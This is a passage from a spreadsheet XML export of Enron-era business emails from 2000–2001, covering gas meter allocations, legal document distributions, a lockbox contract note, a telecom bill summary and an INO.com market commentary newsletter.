  </si>
  <si>
    <t>Wed, 27 Dec 2000 00:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mid1316@car-audio-discount.com'})</t>
  </si>
  <si>
    <t>MB Quart</t>
  </si>
  <si>
    <t>I am interested in buying a pair of MB Quart speakers, specifically the RWC _x000D_
130.  It is a 5.25" Midrange speaker.  What is your price?  Thanks._x000D_
_x000D_
DG    713-853-9573</t>
  </si>
  <si>
    <t>Tue, 17 Jul 2001 19:02:55 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi honey please print this too.  I want to copy it tonight at church Love_x000D_
you_x000D_
 - kim.wps </t>
  </si>
  <si>
    <t>Mon, 28 Feb 2000 10:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>AB 2198 - Local telephone service competition</t>
  </si>
  <si>
    <t>AB 2198 Telecommunications: local telephone service competition. Author: _x000D_
Pescetti Introduced 2/24/00_x000D_
Sponsor: Author_x000D_
Summary:_x000D_
This bill would state the intent of the Legislature to require the commission _x000D_
to remove barriers to local telephone service competition in all _x000D_
unincorporated areas of south Sacramento County, to the extent not preempted _x000D_
by the federal Telecommunications Act of 1996._x000D_
_x000D_
Position:_x000D_
This bill requires a specific area of California to remove barriers to _x000D_
competition. Are there telecom Munis? is this preemptive to possible _x000D_
legislation on Electric Munis? Should we watch the Bill?_x000D_
_x000D_
Attached is a copy of the bill</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 05:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>review of paper by Titman, et al</t>
  </si>
  <si>
    <t xml:space="preserve">resending ..._x000D_
_x000D_
Vasant_x000D_
_x000D_
---------------------- Forwarded by Vasant Shanbhogue/HOU/ECT on 10/10/2000 _x000D_
11:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Vasant Shanbhogue_x000D_
10/02/2000 02:04 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: review of paper by Titman, et al_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 03:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron/Cerberus</t>
  </si>
  <si>
    <t>Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 11/16/00 11:04 AM -----_x000D_
_x000D_
	"Lowe, Deborah" &lt;deborahlowe@akllp.com&gt;_x000D_
	11/15/00 11:02 AM_x000D_
		 _x000D_
		 To: &lt;alan.quaintance@enron.com&gt;, &lt;annmarie.tiller@enron.com&gt;, "Barbour, _x000D_
David" &lt;davidbarbour@akllp.com&gt;, &lt;bill.bowes@enron.com&gt;, _x000D_
&lt;brenda.l.funk@enron.com&gt;, &lt;brent.vasconcellos@enron.com&gt;, _x000D_
&lt;brian.steinbrueck@enron.com&gt;, &lt;carol.st.clair@enron.com&gt;, _x000D_
&lt;clint.freeland@enron.com&gt;, &lt;clint.walden@enron.com&gt;, &lt;damon@rlf.com&gt;, _x000D_
&lt;david.bermingham@rbcds.com&gt;, &lt;eawilburn@prickett.com&gt;, _x000D_
&lt;emily.jelich@royalbank.com&gt;, &lt;gareth.bahlmann@enron.com&gt;, _x000D_
&lt;gina.karathanos@enron.com&gt;, &lt;jlawler@wilmingtontrust.com&gt;, _x000D_
&lt;john.bruen@rbcds.com&gt;, &lt;kenton@rlf.com&gt;, &lt;kevin.d.jordan@enron.com&gt;, _x000D_
&lt;lkao@mayerbrown.com&gt;, "Lowe, Deborah" &lt;deborahlowe@akllp.com&gt;, "McFarling, _x000D_
Muriel" &lt;murielmcfarling@akllp.com&gt;, &lt;mniebruegge@mayerbrown.com&gt;, _x000D_
"Popplewell, Tom" &lt;tompopplewell@akllp.com&gt;, &lt;ryan.siurek@enron.com&gt;, _x000D_
"Sargent, Pat" &lt;patsargent@akllp.com&gt;, "Sullivan, Danny" _x000D_
&lt;dannysullivan@akllp.com&gt;, &lt;tamullen@prickett.com&gt;, &lt;tara.rafter@enron.com&gt;, _x000D_
&lt;tellwood@mayerbrown.com&gt;, &lt;trevor.randolph@enron.com&gt;, _x000D_
&lt;trushar.patel@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Enron/Cerberus_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
People have had trouble opening the documents  in last night's distribution.? _x000D_
We have rerun the redlines and these are now  attached in WordPerfect.? These _x000D_
same documents will be forwarded in Word by  separate email.? Please contact _x000D_
Danny Sullivan at (214) 659-4645 with  comments.? Thank you._x000D_
_x000D_
 - Blank Bkgrd.gif_x000D_
 - RESULT OF COMPARISON DOC NUM 265261V5 TO DOC NUM 265261V6.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 265302V5 TO DOC NUM 265302V6.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 265523V4 TO DOC NUM 265523V5.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 265535V2 TO DOC NUM 265535V3.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 265539V5 TO DOC NUM 265539V6.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 265544V3 TO DOC NUM 265544V4.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 266489V2 TO DOC NUM 266489V3.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 266490V5 TO DOC NUM 266490V6.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 266518V2 TO DOC NUM 266518V3.wpd_x000D_
 - RESULT OF COMPARISON DOC NUM 268865V1 TO DOC NUM 268865V2.wpd</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 10:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Monday USD +0.25 CRB +1.76 S&amp;P +10.34 DOW +12.89 NAS +97.28</t>
  </si>
  <si>
    <t>M O N D A Y   E X T R E M E   M A R K E T S_x000D_
A complimentary service from INO.com ( http://www.ino.com/ )_x000D_
_x000D_
December 11: The CRB Index has climbed 1.76 points to 232.36. The_x000D_
US Dollar Index moved up 0.25 points to 114.42._x000D_
_x000D_
The Dow Industrials edged higher by 12.89 points, at 10725.80, while_x000D_
the S&amp;P 500 edged higher by 10.34 points, last seen at 1380.23. The_x000D_
Nasdaq Composite trended higher 97.28 points to 3014.71._x000D_
_x000D_
FREE OPTIONS INVESTORS KIT_x000D_
http://www.ino.com/specials/barkley/_x000D_
_x000D_
______________________________________________________________________x000D_
_x000D_
FREE Bonus with every order from the INO.com Store_x000D_
______________________________________________________________________x000D_
_x000D_
!!! HOLIDAY SPECIAL - FREE DOMESTIC SHIPPING !!!_x000D_
_x000D_
All orders over $100 shipped within the U.S. get_x000D_
FREE SHIPPING now through Christmas!_x000D_
Orders from outside the U.S. over $100 get $7.50 deducted!_x000D_
_x000D_
http://store.ino.com - - &lt;a href="http://store.ino.com"&gt;Free Shipping!&lt;/a&gt;_x000D_
______________________________________________________________________x000D_
_x000D_
Attention Stock, Futures and Bond Traders:_x000D_
http://store.ino.com/moreinfo.cgi?FMV2793&amp;special=breakthrough_x000D_
_x000D_
What Does Crude Oil, Soybeans and Bellies Have_x000D_
in Common with the Stock Market?_x000D_
_x000D_
E V E R Y T H I N G !_x000D_
_x000D_
Breakthrough Market Discovery Triggers_x000D_
Early Warning System for Astute Traders_x000D_
in Stocks, Bonds and Futures._x000D_
_x000D_
Find out why CNBC Chief Technical Analyst, John Murphy wants you_x000D_
to know this little know market secret and why he thinks that_x000D_
CNBC tips the scales in the other direction for their TV viewers!_x000D_
_x000D_
'Applying Technical Methods to Today's Trading' - John Murphy_x000D_
http://store.ino.com/moreinfo/FMV2793_x000D_
_x000D_
&lt;a _x000D_
href="http://store.ino.com/moreinfo.cgi?FMV2793&amp;special=breakthrough"&gt;Breakthr_x000D_
ough Trading - Click Here!&lt;/a&gt;_x000D_
_x000D_
Order Toll Free 800-538-7424 - 410-867-7424_x000D_
_x000D_
All claims on this product are made by the publisher_x000D_
and not by INO.com. All Products Guaranteed._x000D_
_x000D_
______________________________________________________________________x000D_
_x000D_
E X T R E M E   M A R K E T   C O M M E N T A R Y_x000D_
______________________________________________________________________x000D_
_x000D_
The STOCK INDEXES The Nasdaq and S&amp;P's extended last week's short_x000D_
covering rally on ideas that all of the bad news about earnings has_x000D_
been discounted into the markets. Additional support came from ideas_x000D_
that the Federal Reserve will cut interest rates in 2001. The Nasdaq_x000D_
spiked above this fall's downtrend line crossing near 2950 on Monday._x000D_
Multiple closes above this resistance level are needed to confirm a_x000D_
breakout and trend change has taken place. Meanwhile, the rally in_x000D_
tech stocks helped pull the broader market higher on the day. Closes_x000D_
above last week's high crossing at 10,917.30 would open the door for_x000D_
a possible test of last spring's high crossing at 11,425.40._x000D_
_x000D_
INTEREST RATES March bonds posted a inside day with a lower close as_x000D_
it consolidated some of last week's gains. Light pressure came from_x000D_
today's rebound in the equity markets. Stochastics and RSI are_x000D_
bullish but becoming overbought warning traders that a short- term_x000D_
top may be in or near. Closes below November's uptrend line crossing_x000D_
near 102-24 would signal a top and trend change has taken place._x000D_
_x000D_
CRB INDEX closed higher on Monday led by gains in energies, some_x000D_
foods, and fiber. The CRB continues to consolidate below this fall's_x000D_
high of 234.38. Closes above this resistance level or below the_x000D_
late-November reaction low crossing at 228.04 are needed to clear up_x000D_
near-term direction._x000D_
_x000D_
ENERGIES The energy markets closed higher on Monday due to short_x000D_
covering as Iraqi crude oil exports remain halted for the 11th day_x000D_
and natural gas prices surged due to cold weather moving across the_x000D_
United States. Momentum indicators are bearish but becoming oversold_x000D_
hinting a short-term bottom in January crude oil and the products may_x000D_
be near. Closes above last Thursday's highs in any or all of the_x000D_
complex would strongly suggest a low has been posted._x000D_
_x000D_
CURRENCIES the March Dollar extended its short covering bounce off_x000D_
last Thursday's low and closed above broken trendline support_x000D_
crossing near 114. Closes below last week's low at 112.64 are needed_x000D_
to confirm the recent trendline breakout. However, momentum_x000D_
indicators have become oversold hinting a short covering bounce is_x000D_
possible before this fall's decline continues. The March Swiss Franc_x000D_
and D-mark closed lower on Monday as profit taking from last week's_x000D_
continues. The overbought condition of a number of momentum_x000D_
indicators that hints further setbacks is possible before the_x000D_
corrections are over. The March Japanese Yen posted an inside day_x000D_
with a higher close due to light short covering as it extends the_x000D_
current trading range. Momentum indicators have turned bullish_x000D_
signaling sideways to higher prices near-term are possible. Closes_x000D_
above .9279 or below .9088 are needed to clear up near-term direction_x000D_
in the market._x000D_
_x000D_
PRECIOUS METALS were closed mixed on Monday. February gold extended_x000D_
its setback off last Thursday's high due to the rebound in the U.S._x000D_
Dollar and in doing so turned a number of momentum indicators neutral_x000D_
to bearish. Closes below November's uptrend line crossing near 271.80_x000D_
would confirm the rally off October's low has likely come to an end._x000D_
March silver posted an inside day with a higher close due to light_x000D_
short covering as it consolidated some of last Friday's losses. While_x000D_
another day or two of consolidation is possible, the door is open for_x000D_
a test of November's low at 4.69 cents later this month. March copper_x000D_
closed higher on Monday but near session lows due to profit taking_x000D_
ahead of the close. Today's spike of the 62% retracement level_x000D_
crossing at .8947 followed by the low-range close is a warning to_x000D_
bulls that a short-term top may be in or near. Closes below last_x000D_
Friday's low crossing at 87.55 would likely turn a number of momentum_x000D_
indicators bearish and increase the odds that a short- term top has_x000D_
been posted._x000D_
_x000D_
GRAINS closed lower on Monday. March corn posted another inside day_x000D_
with a lower close as traders squared positions ahead of Tuesday's_x000D_
supply and demand reports. Additional pressure came from news that_x000D_
China sold around 1 million tons of corn on Friday. Expectations for_x000D_
additional sales by China later this week added to the bearish tone._x000D_
Traders are looking for the USDA to lower their export projections by_x000D_
50-100 million bushels in tomorrow's reports. Today's export_x000D_
inspection report came in at a disappointing 28.394 million bushels_x000D_
verse 39.660 million bushels last week. March wheat also closed lower_x000D_
on Monday due to spillover weakness from corn. Traders were reluctant_x000D_
to buy wheat on chances that some of the hard winter wheat crop may_x000D_
experience winterkill due to the winter storm rolling across the_x000D_
plains. Traders are expecting to see the USDA lower its export_x000D_
projection by some 25-million bushels due to this fall's slow export_x000D_
pace. March wheat is challenging the lower boundary of this fall's_x000D_
trading range at 2.69. If this support gives way, 2.63 1/2 then 2.50_x000D_
are potential targets later this winter._x000D_
_x000D_
SOYBEAN COMPLEX closed mixed on Monday. January beans closed_x000D_
fractionally higher on Monday due to light position squaring ahead of_x000D_
tomorrow's supply and demand reports. The trade is looking for a_x000D_
25-35 million bushels increase in the USDA export projection due to_x000D_
this fall's strong export sales. Multiple closes above fib resistance_x000D_
crossing at 5.10 3/4 would open the door for a possible test of this_x000D_
fall's high at 5.25 later this winter. January soybean meal closed_x000D_
higher on Monday thereby confirming last Friday's upside reversal._x000D_
Expectations for continued strong export demand through this winter_x000D_
in both the Asian and European markets will continue to underpin the_x000D_
meal market. Closes above the late- November high crossing at 193.50_x000D_
would renew November's rally and set the stage for a test of weekly_x000D_
resistance crossing at 202.50 later this month. January bean oil_x000D_
posted an inside day with a lower close on Monday as it extends last_x000D_
week's consolidation pattern. At the same time, momentum indicators_x000D_
are bearish signaling sideways to lower prices near-term are_x000D_
possible. A neutral to bearish supply and demand report on Tuesday_x000D_
may provide the catalyst needed to renew the decline off last week's_x000D_
high. The stage appears to be set for a test of the late-November low_x000D_
at 14.64 later this month._x000D_
_x000D_
LIVESTOCK closed mixed on Monday. February hogs closed slightly_x000D_
higher on Monday but near session lows as profit taking ahead of the_x000D_
close erased early strength tied to weather concerns. Momentum_x000D_
indicators are bullish but diverging warning traders that a broad_x000D_
double top may be forming. Closes below last Friday's reaction low_x000D_
along with a downturn by stochastics would increase the odds a top_x000D_
has been posted. February cattle posted an inside day with a lower_x000D_
close as it consolidated some of last week's gains. News that the_x000D_
heaviest snowfall stayed away from cattle-feeding areas limited gains_x000D_
in the market, which fell ahead of the close due to light profit_x000D_
taking. At the same time, cold weather is expected to slow gains,_x000D_
which will help underpin the market. Momentum indicators are bullish_x000D_
hinting a test of long-term resistance crossing near 77.92 is still_x000D_
possible later this month._x000D_
_x000D_
FOOD &amp; FIBER markets were mixed on Monday. March coffee posted an_x000D_
inside day with a lower close on Monday as it consolidated some of_x000D_
last Friday's losses. However, today's low-range close signals_x000D_
additional weakness is possible later this week. If the decline_x000D_
continues, the August 1993 low crossing at 66.25 is March's next_x000D_
target. March cocoa closed lower on Monday signaling the two-day_x000D_
bounce off last Wednesday's low has come to an end. Today's loss_x000D_
turned a number of momentum indicators neutral to bearish signaling a_x000D_
test of November's low at 713 is possible. Closes below this support_x000D_
level would open the door for a test of psychological support_x000D_
crossing at 700 later this winter. March sugar posted a downside_x000D_
reversal on Monday due to a lack of cash buying. March continues to_x000D_
consolidate above minor support crossing at 950. However, momentum_x000D_
indicators remain bearish signaling sideways to lower prices into the_x000D_
end of the year are possible. March cotton posted an inside day with_x000D_
a higher close due to light position squaring ahead of Tuesday's_x000D_
supply and demand report. The big question is whether or not the USDA_x000D_
will lower world production enough to off set lower US demand. Closes_x000D_
above 69.25 or below 66.90 cents are needed to clear up near-term_x000D_
direction in the market._x000D_
_x000D_
Daily Extreme Commentary is brought to you by GLOBALcharts,_x000D_
INO.com's end-of-day charting software for Futures, Futures_x000D_
Options and Optionable Stocks. http://www.globalcharts.com_x000D_
Search the INO Store  - http://store.ino.com/_x000D_
______________________________________________________________________x000D_
_x000D_
T O P   N E W S_x000D_
______________________________________________________________________x000D_
_x000D_
STOCKS_x000D_
_x000D_
Japan Stocks Review: Up 2.2%; tops key 15,000 on strong Nasdaq_x000D_
http://news.ino.com/summary/?id=24042_x000D_
Add1: US Equities Review: Nasdaq up 3%, DJIA inches up, analysts bullish_x000D_
http://news.ino.com/summary/?id=24051_x000D_
UK Stocks Review: FTSE gains as techs maintain momentum_x000D_
http://news.ino.com/summary/?id=24050_x000D_
_x000D_
FOREX_x000D_
_x000D_
US FX Review: Euro falls on M&amp;amp;A activity, US political woes_x000D_
http://news.ino.com/summary/?id=24044_x000D_
Asia FX Review: Yen edging higher against dollar and euro_x000D_
http://news.ino.com/summary/?id=24041_x000D_
Europe FX Review: Sterling bought heavily in M&amp;amp;A-related trade_x000D_
http://news.ino.com/summary/?id=24043_x000D_
_x000D_
CREDIT_x000D_
_x000D_
US Credit Review: Bonds decline sharply as equities gain_x000D_
http://news.ino.com/summary/?id=24039_x000D_
Europe Credit Review: Debt prices slip but display resilience_x000D_
http://news.ino.com/summary/?id=24046_x000D_
Japan Credit Review: Mar falls on firm stocks, short-term rates' rise_x000D_
http://news.ino.com/summary/?id=24049_x000D_
_x000D_
COMMODITIES_x000D_
_x000D_
US Futures Summary: Energy boosts CRB to 1-week high_x000D_
http://news.ino.com/summary/?id=24048_x000D_
Japan Commodity Summary: Japan's Tokyo, Yokohama agricultural commodities _x000D_
futures prices_x000D_
http://news.ino.com/summary/?id=24045_x000D_
CRB Outlook: Hovering around neutral_x000D_
http://news.ino.com/summary/?id=24047_x000D_
_x000D_
EXCHANGES_x000D_
_x000D_
Annual Changes To The Nasdaq-100 Index_x000D_
http://news.ino.com/press/index.cgi?release=23004_x000D_
CBOT To Launch 5-Year Agency Note Futures And Options_x000D_
http://news.ino.com/press/index.cgi?release=23003_x000D_
_x000D_
_____________________________________________________________________________x000D_
_x000D_
E X T R E M E   F U T U R E S_x000D_
_____________________________________________________________________________x000D_
_x000D_
Updated every 10 minutes around the clock._x000D_
More at http://quotes.ino.com/analysis/extremes/futures/_x000D_
_x000D_
WINNERS_x000D_
_x000D_
CCN2   Cocoa Jul 2002                                888        89  +9.88_x000D_
NGF1   Henry Hub Natural Gas Jan 2001              9.413     0.829  +9.77_x000D_
NDZ0   NASDAQ 100 Index Dec 2000                 2982.00    221.50  +8.13_x000D_
PNG1   Propane Feb 2001                           0.6800    0.0425  +6.85_x000D_
SGH1   S&amp;P 500/BARRA Growth Index Mar 2001        780.50     37.00  +5.00_x000D_
YSZ0   NYSE Small Composite Dec 2000              658.50     29.30  +4.58_x000D_
MVZ0   Value Line Index. Mini Dec 2000           1129.00     49.00  +4.50_x000D_
HOG1   Heating Oil Feb 2001                       0.9462    0.0383  +4.02_x000D_
HUG1   New York Harbor Unleaded Gasoline Feb 20    0.7740    0.0297  +3.78_x000D_
GIZ0   Goldman Sachs Commodity Index Dec 2000     256.00      9.05  +3.68_x000D_
_x000D_
LOSERS_x000D_
_x000D_
BDF1   Oriented Strand Board Jan 2001             160.00     -8.00  -4.97_x000D_
NGK3   Henry Hub Natural Gas May 2003              3.710    -0.106  -2.75_x000D_
CCH1   Cocoa Mar 2001                                719       -14  -1.91_x000D_
XWZ1   Wheat Dec 2001                                316        -5  -1.56_x000D_
XEZ1   Soybean Meal Dec 2001                         175      -2.5  -1.43_x000D_
SMZ1   Soybean Meal Dec 2001                         175      -2.5  -1.41_x000D_
EJH1   Euro/Japanese Yen Mar 2001                  95.97     -1.13  -1.16_x000D_
DAG1   BFP Milk Feb 2001                            9.55     -0.11  -1.14_x000D_
XRF1   Soybean Oil Jan 2001                        15.03     -0.17  -1.14_x000D_
LBF1   Random Length Lumber Jan 2001              220.30     -2.50  -1.13_x000D_
_____________________________________________________________________________x000D_
_x000D_
E X T R E M E   S T O C K S_x000D_
_____________________________________________________________________________x000D_
_x000D_
Updated every 10 minutes around the clock._x000D_
More at http://quotes.ino.com/analysis/extremes/stocks/_x000D_
_x000D_
WINNERS_x000D_
_x000D_
QSCG   QS COMMUNICATIONS AG ADS                    9 5/8   4 10/32  +80.23_x000D_
VATA   VERSATA INC                                 9 5/8   2 30/32  +43.12_x000D_
QRSI   QRS CORP                                    7 7/8   2 13/32  +43.02_x000D_
LTRX   LANTRONIX INC                               8 3/4     2 3/8  +39.58_x000D_
EPAY   BOTTOMLINE TECHNOLOGIES                        27   7 22/32  +38.92_x000D_
SIMG   SILICON IMAGE                             8 21/32   2 11/32  +37.13_x000D_
TUTS   TUT SYSTEMS                                 9 3/8     2 1/2  +36.04_x000D_
ISLD   DIGITAL ISLAND INC                          5 3/8     1 3/8  +34.38_x000D_
NCNX   NUCENTRIX BROADBAND NETWORKS             16 30/32     4 1/4  +34.00_x000D_
MCOM   METRICOM INC                             12 18/32    3 3/32  +32.57_x000D_
_x000D_
LOSERS_x000D_
_x000D_
JNIC   JNI CORP(IPO)                              34 3/4       -28  -44.44_x000D_
GELX   GELTEX PHARMACEUTICALS                         48 -13 14/32  -21.94_x000D_
INSP   INFOSPACE INC                             11 6/32  -2 17/32  -18.49_x000D_
BSTE   BIOSITE DIAGNOSTIC                       28 30/32    -6 5/8  -18.37_x000D_
SIRI   SIRIUS SATELLITE RADIO INC                25 2/32  -5 10/32  -17.45_x000D_
ISRG   INTUITIVE SURGICAL                          8 3/8  -1 19/32  -16.67_x000D_
RPS    MORGAN STAN DW 6% RESET PERQS               7 3/4    -1 3/8  -15.49_x000D_
PCG-CA PG&amp;E CAPITAL I 7.90% QUIPS                 19 5/8  -3 19/32  -15.31_x000D_
PIR    PIER 1 IMPORTS                                  9    -1 5/8  -15.29_x000D_
SHPGY  SHIRE PHARMACEUTICALS ADS                43 22/32  -7 26/32  -15.15_x000D_
_x000D_
FREE MANAGED FUTURES &amp; IRA RETIREMENT KIT_x000D_
http://www.ino.com/specials/icm/_x000D_
_x000D_
______________________________________________________________________x000D_
_x000D_
T H A N K   Y O U_x000D_
______________________________________________________________________x000D_
_x000D_
Thank you for subscribing to the Extreme Markets Daily Digest from INO.com_x000D_
( http://www.ino.com/ ). If you want to subscribe to our other email_x000D_
services, or would like to modify your profile please visit_x000D_
http://www.ino.com/email/._x000D_
_x000D_
To subscribe a friend, visit:_x000D_
http://www.ino.com/email/_x000D_
_x000D_
To unsubscribe, visit:_x000D_
http://www.ino.com/email/removeextremes.cgi?email=alewis@enron.com_x000D_
_x000D_
--_x000D_
Copyright 1998-2000 INO.com. All Rights Reserved.</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 02:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Please print - Lockbox documents</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Elizabeth Sager/HOU/ECT on 03/27/2000 _x000D_
10:05 AM ---------------------------_x000D_
_x000D_
Christian Yoder_x000D_
_x000D_
03/24/2000 05:20 PM_x000D_
To: Elizabeth Sager/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Lockbox documents_x000D_
_x000D_
,_x000D_
_x000D_
Elizabeth:_x000D_
_x000D_
Here is a set of documents which might be useful as a starting point for your _x000D_
situation.  The idea in the transaction for which they were tailored was that _x000D_
the California Energy Commission ("CEC") and three California UDC's would _x000D_
divert payments they were otherwise  required to make to a blackballed ESP _x000D_
into the infamous "Lockbox."  The bank-administrator of the Lockbox was to _x000D_
swear in blood to send money coming into the lockbox to our account first and _x000D_
dribble any leftovers to the blackballed ESP as they saw fit.  Also,  the _x000D_
mili-second that the funds plunked into the Lockbox a virulent "Security _x000D_
Interest" attached itself like a vampire to the juggler vein of these funds _x000D_
and this security interest was for our benefit.  _x000D_
_x000D_
 Although I am proud to have the  name Yoder associated with the Lockbox _x000D_
concept,  I must in all modesty confess I have never closed out a real deal _x000D_
using the damn thing.  Stewart Rosman, an innovative trader who is well known _x000D_
for his patience with the legal process,  and later,  John "Big Sky" _x000D_
Malowney,   tried valiantly to get Legal to implement this sturcture but _x000D_
alas, I cannot yet put it on my resume as a triumph.  Good luck and let me _x000D_
know if I can help out in any way with your project.----cgy _x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Aug 2000 02:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meter # 0986563 -</t>
  </si>
  <si>
    <t xml:space="preserve">Daren,_x000D_
_x000D_
This deal began in May, 2000.  I don't have a deal to book to from 12/99  - _x000D_
04/00.  Could you please retro the deal, or please tell me whom I need to _x000D_
speak to to clear this matter up?  Thank you for your time and patience_x000D_
_x000D_
The Rookie_x000D_
_x000D_
ext. 35251_x000D_
---------------------- Forwarded by Mary Poorman/NA/Enron on 08/02/2000 09:09 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Robert Cotten @ ECT                           08/01/2000 02:52 PM_x000D_
	_x000D_
_x000D_
To: Mary Poorman/NA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Meter # 0986563 -  _x000D_
_x000D_
Mary,_x000D_
_x000D_
BJD-ESS Corp is selling this gas to HPLC.  The deal ticket # is 258345.  This _x000D_
is a gathering contract that is attached to the wellhead portfolio.  Let me _x000D_
know if you need any other information._x000D_
_x000D_
Bob_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mary Poorman@ENRON_x000D_
08/01/2000 02:17 PM_x000D_
To: Robert Cotten/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Meter # 0986563 -_x000D_
_x000D_
Bob,  _x000D_
_x000D_
Could you help me find out who owns the gas at this meter......_x000D_
_x000D_
Thank you_x000D_
_x000D_
Mary_x000D_
ext. 35251_x000D_
_x000D_
_x000D_
_x000D_
Mary Poorman_x000D_
08/01/2000 01:04 PM_x000D_
To: Pat Clynes/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Meter # 0986563 -_x000D_
_x000D_
Pat, _x000D_
_x000D_
This is the Texaco Fee CP, it flowed a total of 1,517 from Dec 99 to Apr 2 _x000D_
2000.  There is a Strangers Agmt. set up to take allocations, however, this _x000D_
must be a wellhead related pt. that has declined.  How do I go about finding _x000D_
out who this belongs to?  I thought about ringing Texaco, but, wanted to _x000D_
check before I made any calls._x000D_
_x000D_
Mary_x000D_
---------------------- Forwarded by Mary Poorman/NA/Enron on 08/01/2000 01:01 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
	Anita Luong @ ECT_x000D_
	08/01/2000 10:29 AM_x000D_
	_x000D_
To: Stephanie Gomes/HOU/ECT@ECT, Mary Poorman/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Meter # 0986563 -_x000D_
_x000D_
Stephanie, you are correct.  There's no deal set up for this meter from 12/99 _x000D_
thru 4/2000._x000D_
_x000D_
Mary, please take a look at the meter for the months in question and let _x000D_
Stephanie or myself know whose gas this belongs to._x000D_
_x000D_
Let me know if you have any questions._x000D_
_x000D_
Thanks_x000D_
_x000D_
---------------------- Forwarded by Anita Luong/HOU/ECT on 08/01/2000 10:24 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Stephanie Gomes                           08/01/2000 09:39 AM_x000D_
	_x000D_
_x000D_
To: Anita Luong/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Meter # 0986563 -_x000D_
_x000D_
Anita, _x000D_
If you are no longer handling this meter, please pass this email on to the _x000D_
correct person._x000D_
_x000D_
For meter # 6563, I have meter statements showing that volume did flow for _x000D_
12/99 - 4/00 production on this meter.  I am not seeing this volume in volume _x000D_
management for these production months.  For 5/00 and 6/00 production, the _x000D_
volumes are there.  Is the reason because a deal number needs to be set up?_x000D_
Please let me know.  _x000D_
_x000D_
Thanks, Stephanie ( 3-6004 )_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 10:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jameika.smikle@enron.com'})</t>
  </si>
  <si>
    <t>Re: Erequest 3991</t>
  </si>
  <si>
    <t xml:space="preserve">Aproved in both cases._x000D_
_x000D_
Vince Kaminski_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
From: Jameika Smikle@ENRON on 10/10/2000 04:19 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Erequest 3991_x000D_
_x000D_
Peter Makkai is also requesting this access._x000D_
_x000D_
_x000D_
----- Forwarded by Jameika Smikle/Corp/Enron on 10/10/2000 04:19 PM -----_x000D_
_x000D_
	Jameika Smikle_x000D_
	10/10/2000 04:16 PM_x000D_
		 _x000D_
		 To: Vince Kaminski_x000D_
		 cc: _x000D_
		 Subject: Erequest 3991_x000D_
_x000D_
Stpehen Bennett is requesting Read/Write access to O:\research_x000D_
_x000D_
Please advise. _x000D_
_x000D_
Jameika_x000D_
IRM_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 15:23:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>TR Daily, 26 October, 2001</t>
  </si>
  <si>
    <t>_x000D_
--------------------------------------------------_x000D_
_x000D_
Telecommunications Reports presents...._x000D_
_x000D_
                                  TR DAILY_x000D_
                                  Oct. 26, 2001_x000D_
--------------------------------------------------_x000D_
_x000D_
PLEASE NOTE:  This electronic publication is copyrighted by_x000D_
Telecommunications Reports International. Redistribution or_x000D_
retransmission of any part of this electronic publication -- either_x000D_
internally or externally -- is strictly prohibited. Violation will_x000D_
be cause for immediate termination of your subscription and_x000D_
liability for damages.  You may print out one hard copy for your_x000D_
personal use. If you are interested in having this publication sent_x000D_
to colleagues at your company, additional authorized recipients may_x000D_
be added to your subscription for a fee.  Call Subscriber Services,_x000D_
at (800) 822-6338, or send an e-mail to customerservice@tr.com for_x000D_
more details.  If you prefer not to receive TR Daily, please reply_x000D_
to customerservice@tr.com._x000D_
_x000D_
--------------------------------------------------_x000D_
_x000D_
***See Monday's TR for an On-the-Record interview with John_x000D_
Grimley, European issues adviser for London-based consultancy_x000D_
Chelgate Ltd.  He discusses regulatory strategies for doing_x000D_
business in Europe._x000D_
_x000D_
_x000D_
Table Of Contents_x000D_
Click here for the full issue:_x000D_
